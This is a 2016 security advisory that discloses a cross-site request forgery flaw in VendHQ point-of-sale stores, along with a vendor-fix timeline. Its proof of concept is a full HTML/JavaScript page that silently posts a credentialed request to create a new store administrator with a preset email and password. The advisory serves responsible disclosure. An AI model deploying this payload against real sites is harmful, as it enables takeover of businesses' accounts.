# +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=+
# | ___ _ _____ _ _ |
# | / _ \| | |_ _| | | (_) |
# | / /_\ \ |__ ___ __ _ _ __ | | __ _| |__ _ _ __ |
# | | _ | '_ \/ __|/ _` | '_ \ | |/ _` | '_ \| | '__| |
# | | | | | | | \__ \ (_| | | | | | | (_| | | | | | | |
# | \_| |_/_| |_|___/\__,_|_| |_| \_/\__,_|_| |_|_|_| |
# | // Breaking Security Since Born! |
# | |
# | [-] Website: https://ahsantahir.py |
# | [-] Email: support@ahsantahir.py |
# | |
# +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=+
###
# Title : VendHQ Add-admin CSRF Vulnerability [Full-Store Takeover]
# Author : Ahsan Tahir
# E-mail : mrahsan1337@gmail.com / support@ahsantahir.py
# Web Site : www.ahsantahir.py
# Facebook: http://fb.me/ahsantahiratofficial
# Twitter : @AhsanTahirAT
# Tested on : Kali Linux 2.0, Windows 8.1
# Vendor : https://www.vendhq.com
###
Release Date:
=============
2016-10-14
Product & Service Introduction:
===============================
Vend is retail POS software, inventory management, ecommerce & customer loyalty
for iPad, Mac and PC. Easily manage & grow your business in the cloud.
Abstract Advisory Information:
==============================
Ahsan Tahir, an independent vulnerability researcher discovered an add-admin CSRF vulnerability, which
could lead to full store-takeover of any VendHQ store!
Vulnerability Disclosure Timeline:
==================================
2016-07-20: Found the vulnerability.
2016-07-20: Reported to vendor.
2016-07-22: Vendor Replied.
2016-07-22: Vendor Fixed the vulnerability.
2016-07-31: Vendor rewarded the researcher.
2016-10-14: Public Disclosure
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
A Cross-Site Request Forgery vulnerability has been discovered in VendHQ stores.
This allows remote attackers to craft a HTML Form, which requests a new admin on vendhq stores, when
run by a victim, while he/she is logged in, and if the victim visits a page, his/her
store will be HACKED/Pwn3d!
Proof of Concept (PoC):
=======================
This vulnerability can be exploited by an attacker if he/she injects this code in his webpage, which
they want their victim to visit!
<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://<your-store>.vendhq.com/user/create", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------30540262821640");
xhr.withCredentials = true;
var body = "-----------------------------30540262821640\r\n" +
"Content-Disposition: form-data; name=\"vend_user[vend_image_user_new][id]\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------30540262821640\r\n" +
"Content-Disposition: form-data; name=\"vend_user[id]\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------30540262821640\r\n" +
"Content-Disposition: form-data; name=\"vend_user[name]\"\r\n" +
"\r\n" +
"Hacked\r\n" +
"-----------------------------30540262821640\r\n" +
"Content-Disposition: form-data; name=\"vend_user[display_name]\"\r\n" +
"\r\n" +
"A cashier\r\n" +
"-----------------------------30540262821640\r\n" +
"Content-Disposition: form-data; name=\"vend_user[email]\"\r\n" +
"\r\n" +
"ahsan@ahsan.com\r\n" +
"-----------------------------30540262821640\r\n" +
"Content-Disposition: form-data; name=\"vend_user[password]\"\r\n" +
"\r\n" +
"TestingPassword1\r\n" +
"-----------------------------30540262821640\r\n" +
"Content-Disposition: form-data; name=\"vend_user[password_again]\"\r\n" +
"\r\n" +
"TestingPassword1\r\n" +
"-----------------------------30540262821640\r\n" +
"Content-Disposition: form-data; name=\"vend_user[group_id]\"\r\n" +
"\r\n" +
"5\r\n" +
"-----------------------------30540262821640\r\n" +
"Content-Disposition: form-data; name=\"vend_user[outlet_id][]\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------30540262821640\r\n" +
"Content-Disposition: form-data; name=\"vend_user[vend_image_user_new][image]\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------30540262821640--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
While a victim is logged in to his/her vend store and visits a webpage with the above code
injected, a new admin will be created in their store, with the name as "Hacked" and the Password is "TestPassword1"
and email: ahsan@ahsan.com
Credits & Authors:
==================
Ahsan Tahir - [https://twitter.com/AhsanTahirAT]